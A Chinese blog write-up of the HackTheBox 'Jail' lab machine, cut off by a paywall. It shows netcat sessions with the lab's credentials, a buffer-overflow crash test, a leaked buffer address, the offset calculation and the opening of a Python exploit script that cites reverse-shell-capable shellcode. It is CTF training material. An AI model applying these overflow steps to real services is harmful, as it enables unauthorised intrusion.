hackthebox - jail (考点:linux缓冲区 & nfs配置提权 & rvim提权 & rar解密 & rsa解密)

最新推荐文章于 2024-03-31 11:08:21 发布
最新推荐文章于 2024-03-31 11:08:21 发布
阅读量796 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527786/article/details/106040029
版权

1 扫描

看到常规的22,可能有ssh登录,80进web搜集信息,还有个nfs ,要想到showmount 以及mount -t nfs

2 http下的linux缓冲区溢出

在http里,dirbuster扫,看到jail这些文件。查看c源码,可以知道端口信息,以及账户名和密码,以及还有debug模式
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
下载下来,看就像缓冲区溢出。先测试哪里存在缓冲区溢出,command这里正常

C:\root> nc 10.10.10.34 7411
OK Ready. Send USER command.
USER admin
OK Send PASS command.
PASS 1974jailbreak!
OK Authentication success. Send command.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ERR Invalid command.
C:\root>

输密码这里崩溃,这里存在

C:\root> nc 10.10.10.34 7411
OK Ready. Send USER command.
USER admin
OK Send PASS command.
PASS AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
C:\root>

配合debug模式,也可以看到输密码后会有buffer的跳转地址。

C:\root> nc 10.10.10.34 7411
OK Ready. Send USER command.
DEBUG
OK DEBUG mode on.
USER admin
OK Send PASS command.
PASS aaaaaaaaaaaaaaaaaaaaaaaaaaaa
Debug: userpass buffer @ 0xffffd610
C:\root> nc 10.10.10.34 7411
OK Ready. Send USER command.
DEBUG    
OK DEBUG mode on.
USER admin
OK Send PASS command.
PASS aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Debug: userpass buffer @ 0xffffd610
C:\root>

通过gdb调试,需要对着本机7411测,测崩溃点,很容易知道是28。
在这里插入图片描述

C:\root> /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 62413961 -l 40
[*] Exact match at offset 28
C:\root>

shellcode就用常态固定的https://www.exploit-db.com/exploits/34060/,省的还要测坏字符
return address是根据系统debug给我们的提示(ffffd610) + Offset (28) = ffffd638 这里也不是很懂,不过超纲了oscp的linux bof,且似乎考试只考win版。学有余力可以再研究吧。通过这个脚本就可以拿shell了,是nobody的shell

#!/usr/bin/env python
import socket, sys, telnetlib
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.connect(('10.10.10.34', 7411))
print s.recv(1024) 
s.send("DEBUG") 
print s.recv(1024) 
s.send("USER admin") 
print s.recv(1024)
# https://www.exploit-db.com/exploits/34060/ 
# Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes) 
# Buffer address (ffffd610) + Offset (28) = ffffd638 
payload = "A"*
最低0.47元/天 解锁文章
冬萍子
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
hackthebox-sunday(考点;finger/破解枚举/linux wget提权
冬萍子癸水
04-13 753
这是个SunOS,但其实渗透思路和linux一样 nmap 看到没有80,那基本就不是web层面,而要从端口突破了 首先是79的finger 从里面找存在的用户信息。 于是我用kali自带的字典,以及这个工具。他的网站似乎有时会打不开 perl finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10...
hackthebox-solidstate(考点:Apache James安全/受限制的rbash/ linux修改脚本)
冬萍子癸水
04-12 339
nmap 80看看没啥,dirbuster也没扫出啥有价值的 再看nmap的端口扫描结果,出现了James端口,网上搜搜,很快明白了可能存在的漏洞,这篇文章说了默认登录信息是端口4555的root:root,文章下面还写了一些操作命令 连接它,并列举出用户信息,最后把每个用户的密码都重置为666 telnet 10.10.10.51 4555 listusers setpassword mi...
No.109-HackTheBox-Linux-Jail-Walkthrough渗透学习
qq_34801745的博客
05-22 429
** HackTheBox-Linux-Jail-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/45 靶机难度:中级(4.3/10) 靶机发布日期:2017年10月31日 靶机描述: Jail, like the name implies, involves escaping multiple sandbox environments and escalating between multiple user accou
NFS挂载提权
m0_71300782的博客
09-08 283
2.点击你登录靶场虚拟机的用户名文件新建yige.ssh文件把公钥复制到这里面(.ssh是隐藏文件把它显示出来)authorized_keys(记得不要后缀)二、然后使用WinScp连接工具连接提权靶场。一、首先在kali的桌面创建公钥、私钥。发现在桌面创建了俩个文件夹,就是公私钥。ssh bob@提权靶场的ip地址。三、再回到kali在控制面板输入。1.在桌面打开控制面板shur。3.把公钥复制进去把文件名改成。1.使用WinScp连接。2.把公私钥复制到桌面。
Linux提权姿势二:利用NFS提权
09-01
Linux提权姿势二:利用NFS提权
ansible-role-ssh-chroot-jail:Ansible角色-SSH chroot监狱配置
01-31
**Ansible 角色:SSH chroot 监狱配置** Ansible 是一款强大的自动化工具,广泛用于配置管理、应用部署和任务执行等场景。在安全领域,SSH(Secure Shell)是远程访问服务器的标准协议,但如果不加以限制,可能会...
linux-chroot-jail:为 ssh、sftp 和 vsftp 监禁 Linux 用户的脚本
07-11
linux-chroot-监狱用于 ssh、sftp 和 vsftp 监禁 Linux 用户的脚本监狱用户.sh jailuser.sh 此脚本会在指定用户此后登录服务器时强制执行监禁的 ssh 会话。 用户仅限于$APPS 中指定的命令列表。 它应该适用于大多数 ...
jail-shell:Jail-shell是一种Linux安全工具,主要使用chroot,名称空间技术,限制用户执行特定命令以及访问单独目录
02-05
为了部署和配置Jail-shell,你需要了解如何设置和管理`chroot`环境,如何挂载和配置文件系统,以及如何限制用户权限。这通常涉及到对Linux内核、shell脚本和系统管理的深入了解。在实践中,还可以利用开源项目如...
get-out-of-jail-free:为您的红队一键式法律文书工作
06-22
因此,“get-out-of-jail-free”理念应运而生,它旨在为红队行动提供一种法律保障机制,即预先准备好的法律文书,确保在执行任务时能够合法、合规地进行。 “get-out-of-jail-free”并非游戏中的“出狱免费卡”,...
matlab学生管理系统代码-vpl-jail-system:VPL-VirtualProgrammingLab是Moodle管理编程作业的活
06-01
matlab学生管理系统代码vpl-jail-system(虚拟编程实验室) VPL-Virtual Programming Lab 是 Moodle 的活动模块,用于管理编程作业,其显着特点是: -> 允许在浏览器中编辑程序源代码 -> 学生可以在浏览器中以交互...
nfs 挂载提权 + docker 用户组提权
m0_55628907的博客
09-08 361
目标机器192.168.206.143 需开启2049 nfs端口在攻击机kali安装nfs:查看目标开放的文件夹回显:/home/peter * 说明可挂载/home/peter的所有目录。
【甄选靶场】Vulnhub百个项目渗透——项目四十四:44-pegasus:1(格式化字符串缓冲区溢出,nfs提权
人间体佐菲的博客
10-23 721
【甄选靶场】Vulnhub百个项目渗透——项目四十四:44-pegasus:1(格式化字符串缓冲区溢出,nfs提权
各种提权、渗透经验技巧总结大全(下)
netsec_steven的博客
01-23 2760
liunx 相关提权渗透技巧总结,一、ldap 渗透技巧: 1.cat /etc/nsswitch 看看密码登录策略我们可以看到使用了file ldap模式 2.less /etc/ldap.conf base ou=People,dc=unix-center,dc=net 找到ou,dc,dc设置 3.查找管理员信息 匿名方式 ldapsearch -x
Tryhackme - Kenobi (考点:ProFTPD 1.3.5 & nfs &环境变量提权
冬萍子癸水
05-25 1055
1 扫描 21这个写了版本号ProFTPD 1.3.5,这就是可利用的漏洞,可以进行拷贝复制敏感文件。 参考靶机symfonos2和joy 22可能有ssh登录 80进web信息搜集 139 445smb进去找敏感信息 2049开了nfs考虑挂载 PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2
权限提升-Linux系统权限提升篇&Vulnhub&PATH变量&NFS服务&Cron任务&配合SUID
最新发布
siu~
03-31 432
1、Web或普通用户到Linux-服务安全配合SUID-NFS 2、普通用户到Linux-环境变量配合SUID-$PATH 3、Web或普通用户到Linux-计划任务权限不当-Cron 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
权限提升总结
Christ1na的博客
03-07 6103
提权 内网
john爆破出现Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
zr1213159840的博客
06-30 5599
Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) No password hashes left to crack (see FAQ)
vim用法
void的博客
03-09 2479
vi是个文本编辑器。 vim是从vi发展出来的文本编辑器。 一、启动vim (一)命令语法格式 vim [选项] [参数] (二)选项 -- 在这以后只有文件名 -v Vi模式 (同 "vi") -e Ex模式 (同 "ex") -E改进的Ex模式 -s安静(批处理)模式 (只能与 "ex" 一起使用,也就是-es) -d Diff模式 (同 "vimdiff") -y容易模式 (同 "evim",无模式) -R只读模式 (同 "view") -Z限制模式 (同 "rvim") -m不可修改(写入文件)
使用john进行爆破出现(Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
weixin_42478365的博客
02-28 6499
https://blog.csdn.net/FunkyPants/article/details/78648109
python jail
08-18
Python jail是指一个限制Python代码执行的环境,目的是为了防止恶意代码的执行。在Python jail中,使用了一些限制措施来阻止恶意代码的执行,比如通过白名单的形式限制了能使用的东西,并限制了输入数据的长度。在一...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值